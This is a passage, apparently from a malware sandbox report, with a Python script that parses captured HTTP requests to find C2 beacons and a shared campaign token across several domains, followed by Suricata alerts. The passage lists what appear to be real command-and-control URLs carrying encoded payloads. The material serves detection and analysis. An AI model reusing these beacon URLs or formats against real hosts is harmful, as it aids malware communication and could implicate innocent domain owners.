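    ("POST", "http://www.u939.top/bzd4/", 193),
    ("GET", "http://www.u939.top/bzd4/?LLic=dfSAi8eFG8BNQSKkeeWstgieQ+CEa6NReeHNvP0PJ6u+RJbJfiLK0etwAJJBhacWKaM27nZDkTYaE096JcPOh2DDpT2lFzPFjknSW/IkA4ndNNbJZBed4KRKzQBeBju3mgs613k=&RoZeZ=y3sZclTe3T0", None),
    ("GET", "http://www.sqlite.org/2018/sqlite-dll-win32-x86-3230000.zip", None),
    ("POST", "http://www.shopystart.store/xawa/", 205),
    ("GET", "http://www.shopystart.store/xawa/?LLic=Hqe3sOWJvKCWG/x9tNOlnmsQdBHF4VkLrMyXLOB2T5GmWe087lKVGDOw/FRPsxL2tEDkrod/hD8oPOSEwNhmE1ycDQdQk408J5XLpsuL26K2loZJVyUeuNavvlrKPQfBqaCahko=&RoZeZ=y3sZclTe3T0", None),
    ("POST", "http://www.nordstrom.com/98jk/", 205),
    ("GET", "http://www.nordstrom.com/98jk/?LLic=6yfylvcvS++fp6TLHWbr9Om1+7b2UWch18pSN7AMWcDhtKMO0/Cw84EQwjIAc2w/A3ifRwr08JZ1XjD7JgM2poD+VAQYWS5a68nT5zaoDlnKZNXeNNMQ+OUueokKl8hgqtq40ZA=&RoZeZ=y3sZclTe3T0", None),
    ("POST", "http://www.thought-hop.app/y0er/", 205),
    ("GET", "http://www.thought-hop.app/y0er/?LLic=skpibTBgczcyQH4m12d8C1UJ3RPHJZF3wrOd/jHomuoDvk4OJWpzHm44saXJlLM8fEnYzzT5lGIlIVcd3V+fF+SAeK/GZohWhAiyD9OVQT9eoRINgfF8jLIXuBV+ExgzdvYkTl4=&RoZeZ=y3sZclTe3T0", None),
]

# Thresholds are assumptions drawn from this capture, not a published rule.
_BEACON_PATH = re.compile(r"^/[A-Za-z0-9]{4}/$")
_B64ISH = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")
_MAX_BODY = 300


def split_query_raw(query):
    """Split a query string without percent/plus decoding, so values are compared
    in their on-the-wire form (urllib's parse_qsl would turn '+' into ' ')."""
    pairs = []
    for part in query.split("&"):
        if not part:
            continue
        name, _, value = part.partition("=")
        pairs.append((name, value))
    return pairs


def parse_request(method, url, content_length):
    parts = urlsplit(url)
    return {
        "method": method,
        "host": parts.hostname,
        "path": parts.path,
        "query": split_query_raw(parts.query),
        "content_length": content_length,
    }


def find_beacons(requests):
    """Per host, pair a small form POST to /xxxx/ with a GET to the same directory
    carrying <payload>=<base64-like>&<token>=<value>. Returns {host: details}."""
    by_host = defaultdict(list)
    for method, url, clen in requests:
        r = parse_request(method, url, clen)
        by_host[r["host"]].append(r)

    hits = {}
    for host, reqs in by_host.items():
        for post in reqs:
            if post["method"] != "POST" or not _BEACON_PATH.match(post["path"]):
                continue
            if post["content_length"] is None or post["content_length"] > _MAX_BODY:
                continue
            gets = [
                g for g in reqs
                if g["method"] == "GET" and g["path"] == post["path"]
                and len(g["query"]) == 2 and _B64ISH.match(g["query"][0][1])
            ]
            if gets:
                (payload_name, _), (token_name, token) = gets[0]["query"]
                hits[host] = {
                    "path": post["path"],
                    "payload_param": payload_name,
                    "token_param": token_name,
                    "token": token,
                }
                break
    return hits


def shared_token(hits):
    """A token value identical across otherwise unrelated hosts is a campaign
    identifier worth pivoting on; returns None if the hosts disagree."""
    tokens = {h["token"] for h in hits.values()}
    return tokens.pop() if len(tokens) == 1 else None


if __name__ == "__main__":
    found = find_beacons(REQUESTS)
    for host, d in sorted(found.items()):
        print(f"{host}{d['path']}  {d['token_param']}={d['token']}")
    print("shared token:", shared_token(found))
```

Matching on the raw query rather than a decoded one matters here: the LLic values contain `+` and `/`, and a decoder that maps `+` to a space would break the base64-like check. Keying the hit on the shared RoZeZ value rather than on any one domain is what survives the sample rotating through its host list; the server responses (Cloudflare 302s, Apache 200s, the 301 from www.nordstrom.com) are not part of the match because they vary with whoever happens to own the domain.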
ICMP traffic
No ICMP traffic observed.
IRC traffic
No IRC traffic observed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
UDP 192.168.56.101:59002 -> 164.124.101.2:53 | 2023883 | ET DNS Query to a *.top domain - Likely Hostile | Potentially Bad Traffic |
TCP 192.168.56.101:49168 -> 104.21.80.1:80 | 2023882 | ET INFO HTTP Request to a *.top domain | Potentially Bad Traffic |
Suricata TLS
No Suricata TLS events (all observed HTTP traffic was on port 80 in the clear).
Snort Alerts
No Snort alerts.